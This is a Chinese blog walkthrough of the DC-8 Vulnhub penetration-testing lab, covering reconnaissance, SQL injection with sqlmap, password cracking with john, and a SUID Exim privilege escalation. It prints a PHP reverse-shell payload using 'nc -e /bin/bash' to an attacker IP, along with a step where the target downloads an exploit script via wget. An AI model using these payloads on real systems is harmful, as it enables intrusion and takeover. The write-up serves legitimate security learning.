DC--8

已于 2022-12-27 11:52:10 修改
阅读量154 收藏
点赞数
分类专栏: DC系列 文章标签: web安全 网络安全 nmap DC系列 渗透
于 2022-12-26 10:00:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42248871/article/details/128440577
版权

信息收集

确定IP地址

netdiscover -i eth0 -r 192.168.84.0/24

image-20221221152434215

扫描端口

image-20221221152623543

nmap 漏洞扫描

nmap 192.168.84.184 -p 80 --script=vuln

image-20221221153028042

web测试

该页面可能存在SQL注入

image-20221221152946187

image-20221221152956237

SQLMAP

image-20221221153115393

跑库-跑表-跑字段

image-20221221153156822

image-20221221153235876

image-20221221153321325

image-20221221153406831

使用john解密

john --wordlist=/usr/share/john/password.lst --rules dc8.txt

image-20221221154129734

 账户密码:john,turtle

登录成功

image-20221221154559739

文章处写反弹shell

<?php
exec("nc -e /bin/bash 192.168.84.174 10086");
?>

image-20221221155109040

邮件里面随便填写内容后提交

image-20221221155944523

获得shell

image-20221221160205725

e

提权

查看是否有可用的SUID提权

find / -user root -perm -4000 -print 2>/dev/null

image-20221221160402474

exim4

Exim是一个MTA(Mail Transfer Agent,邮件传输代理)服务器软件,该软件基于GPL协议开发,是一款开源软件。该软件主要运行于类UNIX系统

查看版本,4.0以上

image-20221221160706807

查询是否存在历史漏洞

image-20221221160902577

拷贝到当前目录

image-20221221160942418

http服务

攻击机开启http服务

image-20221221161328968

目标机将46996.sh文件使用wget 命令下载到本地

image-20221221161438974

添加执行权限

image-20221221161743070

image-20221221161731088

flag

image-20221221162030296

小白学安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-DC与LDO的区别及原理
硬件之家,技术前行
04-17 3万+
一、DC-DC与LDO的区别 LDO 低压差线性稳压器(low dropout voltage regulator),仅能使用在降压应用中。也就是输出电压必需小于输入电压。 优点:稳定性好,负载响应快。输出纹波小。 缺点:效率低,输入输出的电压差不能太大。负载不能太大,目前最大的LDO为5A(但要保证5A的输出还有很多的限制条件) DC/DC 直流电压转直流电压。严格来讲,LDO也是DC/
DC-DC PCB layout 指导.docx
06-18
DC-DC PCB Layout 指导 DC-DC PCB 布局是影响 DC-DC 转换器性能的关键因素之一。与 LDO 相比,DC-DC 电路的布局要求更高,因为它具有更高的噪声和更复杂的电路结构。因此,了解 DC-DC 布局的重要性和设计原则是非常...
DC-DC降压IC
weixin_50697266的博客
06-21 2186
DC-DC降压IC 深圳市航誉微电子有限公司型号输入 耐压输出电压输出 电流反馈 电压工作 频率效率静态 工作 电流待机 电流封装直接替换LM259645V5.0V/ 可调输出/ 3.3V/12V3A1.23V150K90% (Max)10mA80uATO-263-5L TO-220-5LLM2596/AP1501LM2596HV63V5.0V/ 可调输出/
名词解释:DC-13
qq_43009770的博客
03-02 1510
就用满足DC-13的负载去接输出,输出不挂掉那就说明产品输出带感性负载能力在DC-13。额定电流I/Ie = 1.1,额定电压U/Ue = 1.1 ,至于T0.95 = 300ms和180ms,没看懂。T0.95 是个指标,指定信号电流的上升时间。是IEC60947-5-1中定义的一种负载。输出的感性负载驱动能力用什么来评估?make(闭合)break断开。DC-13是负载的使用分类。感性负载指标:DC-13。
DC-DC产生负电压
mainbanp
03-21 1576
产生一个负电压使用。实现方法来源。
DC-DC转换电路简介
lida2003的专栏
03-02 2055
因此,在设计DC-DC转换器时,正确选择和使用电感是非常重要的。总的来说,电容在DC-DC转换器设计中具有重要的作用,包括滤波、稳定回路、保护元件、降低干扰和提供瞬态响应等方面,对于提高系统的性能和稳定性至关重要。综上所述,增加电感可以在DC-DC转换器中起到良好的滤波效果,稳定输出电流,并减少电磁干扰的产生,从而降低模拟干扰的水平,使系统工作更加稳定可靠。为了减少DC-DC转换器引起的干扰,可以采取一些措施,如合适的滤波器设计、良好的地布线、选择合适的电磁兼容性材料和设计等。
DC-8靶机渗透测试详细教程
啊醒的博客
05-04 1901
DC-8靶机渗透测试详细教程
Vulnhub DC-7
Pai_Space
03-26 5304
明确:《中华人民共和国网络安全法》 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn't an overly technical challenge, it isn't exactly easy. While it's kind of a logic..
DC-1靶场详解
苏生要努力
03-12 2840
DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/
DC-3靶机
m0_57954651的博客
10-01 1856
保存就上传 然后进行测试访问 (再根据joomla的特性 模块会单独放在一个文件夹里/templates/ 而beez3模块就在/templates/beez3/里面 刚才创建的webshell路径为)http://192.168.47.150/templates/beez3/shell.php。文本写的是漏洞产生的原因 描述和漏洞利用的方法 还附上了exp 最后一行的连接 (执行下两个文件 Linux系统下.(点)是执行某个文件的意思 (./compile.sh)
DC-8靶机
weixin_45778886的博客
03-26 3349
环境搭建
DC-DC变换器Simulink仿真模型
08-07
**DC-DC变换器Simulink仿真模型** 在电子工程领域,DC-DC变换器是一种用于改变直流电压的装置,广泛应用于电源管理、电池供电设备、汽车电子系统以及各种嵌入式系统中。Simulink是MATLAB环境下的一个动态系统建模...
simulink仿真-PFC、DC-DC
04-12
在电力电子领域,Simulink被广泛用于设计和仿真各种电源转换系统,如PFC(功率因数校正)和DC-DC转换器。本文将深入探讨标题和描述中涉及的"simulink仿真-PFC、DC-DC"的相关知识点。 首先,我们来看功率因数校正...
DC-DC电路设计技巧及器件选型原则
03-24
DC-DC电路设计技巧及器件选型原则 DC-DC电路设计技巧及器件选型原则是指在直流电路中将一个电压值的电能变为另一个电压值的电能的装置。DC-DC转换器是实现这一功能的关键器件,包括控制芯片、电感线圈、二极管、...
DC-UPS
03-23
介绍了关于DC-UPS的详细说明,提供不间断电源UP的技术资料的下载。
提升无线网络安全:用Python脚本发现并修复WiFi安全问题
m0_68483928的博客
07-17 481
文章详细介绍了如何使用Python脚本和一些强大的开源工具来捕获和测试WPA/WPA2握手。通过上述步骤,您可以在本地测试WiFi密码的安全性,并了解其潜在的漏洞。最后,选择指定密码本进行爆破(我这里的是从网络上收集的,大家可以自行去收集,或者评论或私信我获取)在本文中,我们将介绍并展示如何使用Python脚本来破解WiFi密码。首先,它会验证路由器的MAC地址(BSSID)是否格式正确,例如00:77:88:33:44:55。工具,通过提供的单词表文件来获取密码。·命令查看路由器的网卡地址,并输入。
web安全之跨站脚本攻击xss
奔跑的小猪仔
07-17 1007
xss 跨站脚本攻击。它指的是恶意攻击者往web页面里插入恶意js代码,当用户浏览该页之时,嵌入其中web里面的js代码会被执行,从而达到恶意的特殊目的。
2024年对网络安全专业的观点解析
最新发布
goodxianping的专栏
07-17 592
网络安全专业的毕业生能够适应多个行业和岗位,包括但不限于政府部门、金融机构、大型互联网公司、电信运营商、科研机构的安全团队。学历较低、经验不足的大量初级从业人员与企业的需求不匹配,一方面找工作难,一方面企业招聘不到合适的安全人员,导致供需矛盾。在网络安全领域,学历并非衡量一个人能力的唯一标准,但普遍较低的学历水平确实反映了行业人才结构的某些问题。张雪峰对网络安全专业的看法是积极和乐观的。随着信息时代的到来,各类企业和组织对网络安全的需求越来越大,使得该专业的毕业生在市场上拥有很大的需求量。
网络安全----web安全防范
weixin_55357256的博客
07-16 707
以下代码用来防范流行的DDoS攻击,ARP欺骗,CC攻击,XXS攻击,对输入的恶意代码进行过滤,嵌入到web程序可以很好的防范网络攻击,但如果想要更好的防范网络攻击,还需要更加复杂的配置和更硬核的硬件。print(f"可能的 CC 攻击针对资源 {resource} 检测到")# 用于检测 CC 攻击的函数(简单示例,通过监测短时间内对同一资源的请求频率)# 用于检测 XSS 攻击的函数(简单示例,检查输入中是否存在可疑脚本标签)# 用于检测 DDoS 攻击的函数(简单示例,通过监测短时间内的连接数量)
高频隔离软开关DC-DC变换技术研究
"2014年电源网年会上,沙德尚博士分享了关于高频隔离软开关DC-DC变换器的研究成果,主要包括全桥+Boost混合式高效率变换器、输入串联输出并联(ISOP)移相全桥全范围软开关变换器以及三电平移相+LLC混合变换器的探讨...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值